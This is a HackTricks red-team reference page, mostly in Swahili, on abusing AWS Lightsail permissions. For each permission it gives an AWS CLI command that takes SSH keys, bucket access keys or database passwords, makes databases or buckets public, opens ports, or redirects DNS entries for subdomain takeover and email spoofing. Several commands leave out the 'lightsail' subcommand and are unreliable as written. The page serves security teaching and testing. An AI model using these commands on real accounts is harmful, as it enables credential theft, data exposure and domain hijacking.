AWS - Lightsail Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Lightsail

Kwa maelezo zaidi kuhusu Lightsail angalia:

Ni muhimu kutambua kwamba Lightsail haitumii majukumu ya IAM yanayomilikiwa na mtumiaji bali kwa akaunti inayosimamiwa na AWS, hivyo huwezi kutumia huduma hii kwa privesc. Hata hivyo, data nyeti kama vile msimbo, funguo za API na taarifa za database zinaweza kupatikana katika huduma hii.

`lightsail:DownloadDefaultKeyPair`

Ruhusa hii itakuruhusu kupata funguo za SSH za kufikia mifano:

aws lightsail download-default-key-pair

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya mifano.

`lightsail:GetInstanceAccessDetails`

Ruhusa hii itakuruhusu kuunda funguo za SSH ili kufikia mifano:

aws lightsail get-instance-access-details --instance-name <instance_name>

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya mifano.

`lightsail:CreateBucketAccessKey`

Ruhusa hii itakuruhusu kupata ufunguo wa kufikia ndoo:

aws lightsail create-bucket-access-key --bucket-name <name>

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya bucket.

`lightsail:GetRelationalDatabaseMasterUserPassword`

Ruhusa hii itakuruhusu kupata akreditif za kufikia database:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

`lightsail:UpdateRelationalDatabase`

Ruhusa hii itakuruhusu kubadilisha nenosiri la kufikia hifadhidata:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

Ikiwa database si ya umma, unaweza pia kuifanya kuwa ya umma na ruhusa hizi na

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

`lightsail:OpenInstancePublicPorts`

Ruhusa hii inaruhusu kufungua bandari kwa Mtandao.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Madhara Yanayoweza Kutokea: Upatikanaji wa bandari nyeti.

`lightsail:PutInstancePublicPorts`

Ruhusa hii inaruhusu kufungua bandari kwa Mtandao. Kumbuka kwamba wito utafungia bandari yoyote iliyofunguliwa ambayo haijatajwa ndani yake.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Madhara Yanayoweza Kutokea: Upatikanaji wa bandari nyeti.

`lightsail:SetResourceAccessForBucket`

Ruhusa hii inaruhusu kutoa upatikanaji wa instances kwa bucket bila hati zozote za ziada.

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

Madhara Yanayoweza Kutokea: Upatikanaji mpya wa uwezekano wa mifuko yenye taarifa nyeti.

`lightsail:UpdateBucket`

Kwa ruhusa hii, mshambuliaji anaweza kutoa upatikanaji wa kusoma kwa akaunti yake ya AWS juu ya mifuko au hata kufanya mifuko hiyo kuwa ya umma kwa kila mtu:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Madhara Yanayoweza Kutokea: Upatikanaji mpya wa uwezo wa mifuko yenye taarifa nyeti.

`lightsail:UpdateContainerService`

Kwa ruhusa hii, mshambuliaji anaweza kutoa ufikiaji kwa ECRs za kibinafsi kutoka kwa huduma za kontena.

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Madhara Yanayoweza Kutokea: Pata taarifa nyeti kutoka ECR ya faragha

`lightsail:CreateDomainEntry`

Mshambuliaji mwenye ruhusa hii anaweza kuunda subdomain na kuielekeza kwenye anwani yake ya IP (uchukuaji wa subdomain), au kuunda rekodi ya SPF inayomruhusu kudanganya barua pepe kutoka kwenye domain, au hata kuweka domain kuu kwenye anwani yake ya IP.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Madhara Yanayoweza Kutokea: Kuchukua udhibiti wa kikoa

`lightsail:UpdateDomainEntry`

Mshambuliaji mwenye ruhusa hii anaweza kuunda subdomain na kuielekeza kwenye anwani yake ya IP (kuchukua subdomain), au kuunda rekodi ya SPF inayomruhusu kutuma barua pepe kwa kutumia kikoa hicho, au hata kuweka kikoa kikuu kwenye anwani yake ya IP.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Madhara Yanayoweza Kutokea: Kuchukua udhibiti wa domain

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAWS - Lambda Privesc NextAWS - Mediapackage Privesc

Last updated 3 days ago